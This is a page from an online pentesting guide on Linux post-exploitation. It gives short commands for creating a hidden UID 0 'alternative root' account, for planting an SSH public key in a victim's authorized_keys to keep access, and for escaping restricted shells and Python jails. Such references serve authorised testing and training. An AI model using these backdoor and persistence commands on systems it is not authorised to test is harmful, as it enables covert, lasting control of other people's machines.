The Pentesting Guide
TwitterBlog
  • The Pentesting Guide
  • ℹ️0 - Pre-Engagement
  • 🔍1 - Information Gathering
  • Passive (OSINT)
  • Active
    • 🕵️HUMINT
    • WIFI
    • IP & Port Scanning
    • Services
      • 21 - FTP
      • 22 - SSH
      • 25 - SMTP
      • 53 - DNS
      • 80,443 - WEB
      • 88 - Kerberos
      • 110 - POP3
      • 111 - rpcbind
      • 161 - SNMP
      • 389 - LDAP
      • 139,445 - SMB
      • Active Directory
  • 💣2 - Exploitation
  • Brute Forcing
  • WEB
    • Apache Tomcat
    • Authentication
    • Broken Access Control
    • Cache poisoning
    • Clickjacking
    • CORS
    • CSRF
    • File Inclusion
    • Host Header Injection
    • HTTP Request Smuggling
    • Information disclosure
    • JWT
    • OS command injection
    • PHP deserialisation
    • SQLi
    • SSRF
    • SSTI
    • Shellshock
    • Unrestricted File Upload
    • XSS
    • XXE
  • Web (OWASP Test cases)
    • 4.1 Information Gathering
    • 4.2 Configuration and Deployment Management Testing
    • 4.3 Identity Management Testing
    • 4.4 Authentication Testing
    • 4.5 Authorization Testing
    • 4.6 Session Management Testing
    • 4.7 Input Validation Testing
    • 4.8 Testing for Error Handling
    • 4.9 Testing for Weak Cryptography
    • 4.10 Business Logic Testing
    • 4.11 Client-side Testing
    • 4.12 API Testing
  • WIFI
  • HUMINT
    • 🎣Gophish (Phishing)
    • Malicious Phishing Files
    • Phishing Evaluation
  • BoF - Windows(x86)
  • Active Directory
    • Kerberos
    • GPOs
    • Certificates
    • LAPS
    • Domain Trusts
  • 👿3 - Post Exploitation
  • File transfer
  • Shells
  • Situational Awareness
    • Containers and VMs
    • Linux
    • Windows
      • Dumping Credentials
      • Countermeasure Evasion
    • Active Directory
      • BloodHound & SharpHound
  • General
    • Linux
    • Windows
  • Local Privilege Escalation
    • Linux
    • Windows
  • Persistance
    • Windows
  • Cracking
  • Pivoting
    • Tunnelling & Port Forwarding
  • Lateral Movement
  • WIFI
  • 📓4 - Report
  • 🧹5 - House cleaning
Powered by GitBook
On this page
  • Introduction
  • User
  • Creating a user
  • Add a user to a group
  • Create an alternative root user
  • Login through SSH
  • Shell Escapes
  • SSH
  • Python Jail
  1. General

Linux

Introduction

In this section, you will find several useful commands for the Post-Exploitation phase in Linux systems.

User

Creating a user

sudo useradd [-m] <USERNAME>

Add a user to a group

sudo usermod -aG <GROUP> <USERNAME>

Create an alternative root user

useradd -m -ou 0 -g 0 -p <ENCRYPTED_PASSWORD> -s /bin/bash <USERNAME>

Login through SSH

There are times when we have a remote terminal as a user but we want to have access as that user via SSH although we do not know their password. SSH keys are used for these cases.

  1. Generate a SSH key pair.

kali@kali:~$ ssh-keygen 
Generating public/private rsa key pair.
Enter file in which to save the key (/home/kali/.ssh/id_rsa): 
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /home/kali/.ssh/id_rsa
Your public key has been saved in /home/kali/.ssh/id_rsa.pub
[...]
  1. Add the public key to the victim's file ~/.ssh/authorized_keys:

echo -e "\n<PUB_KEY>\n" >> ~/.ssh/authorized_keys
  1. Log in.

ssh -i ~/.ssh/id_rsa <USERNAME>@<IP>

Shell Escapes

It could be the case that you have obtained access to a restricted shell allowing you to perform a minimal amount of commands and preventing you from accessing other directories or files.

In this section, you will find some ways to escape those restricted shells.

SSH

ssh <USERNAME>@<TARGET_I -t "bash --noprofile -i"

Python Jail

echo os.system('/bin/bash')

For more examples of how to escape restricted shells, read the following articles.

Last updated 2 years ago

rbash escape | rbash restricted shell escape
Escaping Restricted Linux Shells
Escaping python jails